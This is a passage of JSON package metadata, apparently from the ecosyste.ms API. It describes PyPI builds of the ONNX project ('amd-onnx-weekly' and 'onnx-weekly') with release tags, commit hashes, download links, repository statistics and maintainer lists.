cosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:18:07.251Z","dependent_packages_count":0,"downloads":706,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":59.86729557714339,"dependent_packages_count":10.63065240667199,"stargazers_count":0.3098619829465305,"forks_count":0.26817269913439434,"docker_downloads_count":null,"average":17.768995666474076},"purl":"pkg:pypi/amd-onnx-weekly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/amd-onnx-weekly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/amd-onnx-weekly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/amd-onnx-weekly/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T16:54:51.429Z","issues_count":933,"pull_requests_count":834,"avg_time_to_close_issue":20454176.395948436,"avg_time_to_close_pull_request":7484056.472108844,"issues_closed_count":538,"pull_requests_closed_count":735,"pull_request_authors_count":122,"issue_authors_count":498,"avg_comments_per_issue":3.084673097534834,"avg_comments_per_pull_request":2.241007194244604,"merged_pull_requests_count":575,"bot_issues_count":0,"bot_pull_requests_count":149,"past_year_issues_count":336,"past_year_pull_requests_count":478,"past_year_avg_time_to_close_issue":1613074.5972222222,"past_year_avg_time_to_close_pull_request":604450.2235294117,"past_year_issues_closed_count":144,"past_year_pull_requests_closed_count":425,"past_year_pull_request_authors_count":55,"past_year_issue_authors_count":209,"past_year_avg_comments_per_issue":2.4642857142857144,"past_year_avg_comments_per_pull_request":2.215481171548117,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":114,"past_year_merged_pull_requests_count":355,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"jcwchen","count":45,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"linkerzhang","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"prasanthpul","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"houseroad","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"lutzroeder","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"}],"active_maintainers":[{"login":"andife","count":58,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"liqunfu","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"zhenhuaw-me","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"take-cheeze","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/amd-onnx-weekly/codemeta","maintainers":[{"uuid":"thiagocrepaldi","login":"thiagocrepaldi","name":null,"email":null,"url":null,"packages_count":5,"html_url":"https://pypi.org/user/thiagocrepaldi/","role":null,"created_at":"2024-07-16T01:31:01.268Z","updated_at":"2024-07-16T01:31:01.268Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/thiagocrepaldi/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890698,"maintainers_count":381518,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":6337987,"name":"onnx-weekly","ecosystem":"pypi","description":"Open Neural Network Exchange","homepage":"https://onnx.ai/","licenses":"Apache-2.0","normalized_licenses":["Apache-2.0"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":151,"first_release_published_at":"2023-02-14T23:44:46.000Z","latest_release_published_at":"2023-09-18T00:27:43.000Z","latest_release_number":"1.15.0","last_synced_at":"2026-06-11T14:45:39.535Z","created_at":"2023-02-15T00:05:51.047Z","updated_at":"2026-06-11T14:45:39.536Z","registry_url":"https://pypi.org/project/onnx-weekly/","install_command":"pip install onnx-weekly --index-url https://pypi.org/simple","documentation_url":"https://onnx-weekly.readthedocs.io/","metadata":{"funding":null,"documentation":null,"classifiers":["Programming Language :: Python :: 3"],"normalized_name":"onnx-weekly","project_status":null},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2024-10-29T19:59:31.000Z","size":35154,"stargazers_count":17846,"open_issues_count":353,"forks_count":3670,"subscribers_count":437,"default_branch":"main","last_synced_at":"2024-10-29T20:10:31.600Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","mxnet","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2024-10-29T17:45:37.000Z","dependencies_parsed_at":"2024-06-01T21:40:18.027Z","dependency_job_id":null,"html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2553,"total_committers":336,"mean_commits":7.598214285714286,"dds":0.8950254602428516,"last_synced_commit":"8a6b70f0adcff5409b8cd65883bbbea7d6c4f4e1"},"previous_names":[],"tags_count":30,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121765,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"8a1319733a5518bd0001842db27e2df53a306eff","kind":"commit","published_at":"2019-01-23T01:49:13.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.0/manifests"},{"name":"v1.2.3","sha":"5af210ca8a1c73aa6bae8754c9346ec54d0a756e","kind":"commit","published_at":"2018-09-07T22:57:18.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.3","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.3/manifests"},{"name":"v1.3.0","sha":"bae6333e149a59a3faa9c4d9c44974373dcf5256","kind":"commit","published_at":"2018-08-30T17:33:20.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.3.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.3.0/manifests"},{"name":"v1.2.2","sha":"3376d4438aaadfba483399fa249b841153152bc0","kind":"commit","published_at":"2018-06-18T18:43:47.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"c7b60050ad6ae963bf2cc1d0eb3c32b07eb7eeed","kind":"commit","published_at":"2018-05-25T02:03:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.2.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.2.1/manifests"},{"name":"v1.1.2","sha":"2f85783fc43576b5e39b207f95d5f789641ae706","kind":"commit","published_at":"2018-04-25T23:02:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.2/manifests"},{"name":"v1.1.0","sha":"79dc46fa4d484981f75695a73f3d38d5717fc435","kind":"commit","published_at":"2018-03-10T06:34:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.1.0/manifests"},{"name":"v1.0.1","sha":"7633012b06b4caf0f829060668d06948c7f42e03","kind":"commit","published_at":"2018-01-26T02:25:37.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0.1/manifests"},{"name":"v1.0","sha":"5712a94fa8bd9cb4c99f2a5c05156576739f76f4","kind":"commit","published_at":"2017-12-04T21:39:16.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.0/manifests"},{"name":"v0.2","sha":"63569b8a2e2ad4f56c5476954337a87cc4428862","kind":"commit","published_at":"2017-10-10T04:52:28.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.2","html_url":"https://github.com/onnx/onnx/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/